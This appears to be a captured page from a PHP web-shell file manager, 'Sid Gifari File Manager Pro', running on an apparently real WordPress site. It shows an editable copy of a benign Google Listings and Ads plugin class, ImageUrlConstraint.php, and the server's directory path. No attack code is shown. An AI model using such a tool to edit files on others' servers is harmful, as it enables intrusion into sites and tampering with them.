🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-19 14:12:55 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
thedasstores.com
/
wp-content
/
plugins
/
google-listings-and-ads
/
src
/
Validator
📍 /home/therahul/thedasstores.com/wp-content/plugins/google-listings-and-ads/src/Validator
🔄 Refresh
✏️
Editing: ImageUrlConstraint.php
Writable
<?php declare( strict_types=1 ); namespace Automattic\WooCommerce\GoogleListingsAndAds\Validator; use Symfony\Component\Validator\Constraints\Url as UrlConstraint; defined( 'ABSPATH' ) || exit; /** * Class ImageUrlConstraint * * @package Automattic\WooCommerce\GoogleListingsAndAds\Validator */ class ImageUrlConstraint extends UrlConstraint { /** * @var string */ public $message = 'Product image "{{ name }}" is not a valid name.'; }
💾 Save Changes
❌ Cancel